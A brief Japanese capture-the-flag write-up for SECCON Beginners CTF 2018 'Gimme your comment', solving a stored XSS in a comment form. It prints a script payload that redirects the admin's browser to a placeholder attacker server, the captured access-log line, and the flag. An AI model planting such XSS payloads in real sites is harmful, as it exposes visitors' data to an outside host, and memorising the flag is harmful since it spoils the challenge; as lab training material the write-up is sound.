SECCON Beginners CTF 2018 - Gimme your comment
問題文
ビギナーズカンパニーは皆様からのご意見をお待ちしています。 お問合わせの回答には特別なブラウザを使用しており、このブラウザの User-Agent が分かった方には特別に得点を差し上げます :-) http://gyc.chall.beginners.seccon.jp
writeup
右上の新規投稿ボタンを押下すると、「タイトル」と「本文」を入力して投稿可能な画面へ遷移する。
「本文」項目にXSSの脆弱性がある。
<script>location.href="http://<myserver>/1g993rc1"</script>
を入力して投稿する。
管理者からアクセスが来た。
153.127.201.157 - - [27/May/2018:10:59:15 +0900] "GET / HTTP/1.1" 200 288 "http://nginx/posts/2a15c020e11025c2d3d78c66f683f2bb9ca9302c" "ctf4b{h4v3_fun_w17h_4_51mpl3_cr055_5173_5cr1p71n6}"
フラグゲット。
ctf4b{h4v3_fun_w17h_4_51mpl3_cr055_5173_5cr1p71n6}